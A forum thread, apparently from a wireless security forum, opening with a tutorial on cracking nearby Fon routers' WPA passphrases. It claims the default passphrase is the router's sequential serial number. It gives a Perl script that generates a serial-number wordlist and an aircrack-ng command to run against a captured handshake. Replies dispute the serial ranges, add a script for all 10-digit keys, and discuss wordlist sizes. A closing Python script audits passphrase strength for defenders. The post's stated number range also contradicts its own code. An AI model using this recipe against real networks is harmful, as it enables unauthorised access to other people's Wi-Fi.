
Thread: How to Bruteforce a WPA Fon Wlan

  1. #1

    How to Bruteforce a WPA Fon Wlan

    Hey Community,


    In this little tutorial I'm gonna show you how to bruteforce nearby Fon routers.

    So the interesting thing which I noted is that a Fon AP's default WPA passphrase is its serial number, printed under the box. These serial numbers are sequential, thus making it very easy to guess their entire range.

    So for this I use a little Perl script, which generates a file including all numbers from 807200000 till 8702555555
    Code:
    #!/usr/bin/perl
    # Append each number in the range to numbers.txt, one per line
    $n = 8702000000;
    while ($n <= 8702555555) { system("echo $n >> numbers.txt"); $n++; }

    So then we need a WPA handshake to try out. I'm not gonna describe how you get one because there are a million posts about it.

    Then we simply use Aircrack and start bruteforcing

    aircrack-ng fon-01.cap -w /root/fon/numbers.txt

    So this is it. Cracked.

    If you have further questions feel free to send a PM or visit my blog.
    In German = My_0wn_Remote
    In English = my_english_remote

    I also created a little tutorial video for this whole thing

    YouTube - How to Bruteforce a nearby WPA Fon Wlan

    Maybe it is worth it for the Video Section, I can't measure

    =) Reeth
    www.myownremote.blogspot.com

  2. #2
    Senior Member orange's Avatar
    Join Date
    Jan 2010
    Posts
    134


    included all Numbers from 807200000 till 8702555555
    How do you come to that assumption? I have 7 Foneras (2100 model) and all my serial numbers are out of that particular range. JFYI, there already have been some efforts from FoneraHacks forums-member verticalfall to create precomputed WPA tables for the MyPlace SSID (covering several ranges of Fonera serial numbers) - unfortunately I cannot find the link currently though.

    Nice project!

  3. #3


    hey or4n9e
    yeah that could be possible, that it doesn't fit in your country, maybe they change the Serial Number in different countries...but I don't think so...
    I also have 2 Fonera 2100 Routers but they all got S/N with 8072....Numbers...
    www.myownremote.blogspot.com

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851


    Quote Originally Posted by Reeth View Post
    but they all got S/N with 8072....Numbers...
    Have a look through the various forums around the place, I can assure you that, like the man said, they do not all fall within the 8072 range.

    That said, the sheer size of the serial key notwithstanding, you could just compute the numerics for all the possibilities at that width of serial numbers (10^10 or something - it's early and my math-fu is weak without coffee). It wouldn't even be hard to do, so let me try to hack something up while I write this post (it will be untested):
    Code:
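    #!/usr/bin/perl
    use strict;
    use warnings;
    # Write every 10-digit decimal string, zero-padded, one per line.
    # %010d needs a perl built with 64-bit integers for values this large.
    open(my $dict, '>', 'outputfile.txt') || die "Bugger: $!";
    my $i = 0;
    while ($i < 10000000000) {
        printf $dict "%010d\n", $i;
        $i++;
    }
    close($dict);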
    The numbers are large, you are dealing with 10,000,000,000 possibilities which is a lot, a pyrit box might be able to generate them fast enough, but for my taste that is a bit of a stretch.

    That would work for any 10 numeric digit WPA key by the way, and removes the need for targeted mishaps like the original.

    Also it removes that terrible call to echo which would slow the generation down.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418


    My fon S/N starts with 8704... Seems that the only number that repeats itself is the first "8"...

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    I have a word list which contains all possible combinations of 10 digit hex and it is about 37 gigs, just FYI

  7. #7


    My fon S/N starts with 8704... Seems that the only number that repeats itself is the first "8"...
    you meant the first 3? because the range I did create was from 807200000 till 8702555555

    @Snayler what kind of Fon did you use?

    What are the standard Ranges for

    Fon ?
    Fon+
    .....
    are there any correlations ?
    www.myownremote.blogspot.com

  8. #8
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418


    Quote Originally Posted by Reeth View Post
    you ment the first 3 ? because the range i did create was from 807200000 till 8702555555
    Sorry, I misread your post. I thought it was from 807200000 to 807255555. But still, it wouldn't get my default WPA password.

    Quote Originally Posted by Reeth View Post
    @Snalyer what kind of fon did you use ?
    FON2100A/B/C

  9. #9
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851


    Quote Originally Posted by pureh@te View Post
    I have a word list which contains all possible combinations of 10 digit hex and it is about 37 gigs, just FYI
    hex as in A to F as well?

    How long does it take your pyrit box to get through that list (is it included in the timing stats we've already seen) ?
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  10. #10
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159


    Quote Originally Posted by pureh@te View Post
    I have a word list which contains all possible combinations of 10 digit hex and it is about 37 gigs, just FYI
    Quote Originally Posted by Gitsnik View Post
    hex as in A to F as well?

    How long does it take your pyrit box to get through that list (is it included in the timing stats we've already seen) ?
    Hey pureh@te -- do you mean to say your wordlist is 8 digits of hex, 0->F inclusive? I just did a quick calculation and that file would be ~37Gig, so just wondering if that's what you mean? Thanks!
    You. Are. Doing. It. Wrong.
    -Gitsnik
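
Added example, not part of any post in this thread: a defender-side audit showing why a serial-number default makes a poor WPA passphrase, using the keyspace and wordlist sizes the posts above discuss. The guess rate and the 64-bit threshold are assumptions, and the sample passphrases are constructed.

```python
import math
import string

# Candidate alphabets, smallest first: a passphrase is scored against the
# cheapest search space that contains every one of its characters.
ALPHABETS = [
    ("digits", string.digits),
    ("hex", string.digits + "abcdef"),
    ("hex", string.digits + "ABCDEF"),
    ("lowercase+digits", string.ascii_lowercase + string.digits),
    ("alphanumeric", string.ascii_letters + string.digits),
    ("printable ASCII", "".join(chr(c) for c in range(32, 127))),
]

ASSUMED_GUESSES_PER_SECOND = 100_000  # assumption, not a measured rate
ASSUMED_MIN_BITS = 64                 # assumption: audit threshold


def wordlist_bytes(alphabet_size, length):
    """Size of a file holding every candidate, one per line plus newline."""
    return alphabet_size ** length * (length + 1)


def audit(passphrase, rate=ASSUMED_GUESSES_PER_SECOND):
    """Score a WPA-PSK passphrase by the exhaustive search that covers it."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 printable ASCII characters")
    for name, alphabet in ALPHABETS:
        if set(passphrase) <= set(alphabet):
            break
    else:
        raise ValueError("passphrase contains non-printable or non-ASCII characters")
    candidates = len(alphabet) ** len(passphrase)
    bits = math.log2(candidates)
    return {
        "charset": name,
        "candidates": candidates,
        "bits": round(bits, 1),
        "wordlist_bytes": wordlist_bytes(len(alphabet), len(passphrase)),
        "hours_to_exhaust": candidates / rate / 3600,
        "weak": bits < ASSUMED_MIN_BITS,
    }


if __name__ == "__main__":
    # Constructed sample values, not taken from any real device.
    for sample in ("8702123456", "0a1b2c3d4e", "correct-Horse7battery_staple"):
        print(sample, audit(sample))
```

An access point still using a factory passphrase that audits as "digits" should have it replaced with a long random one.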
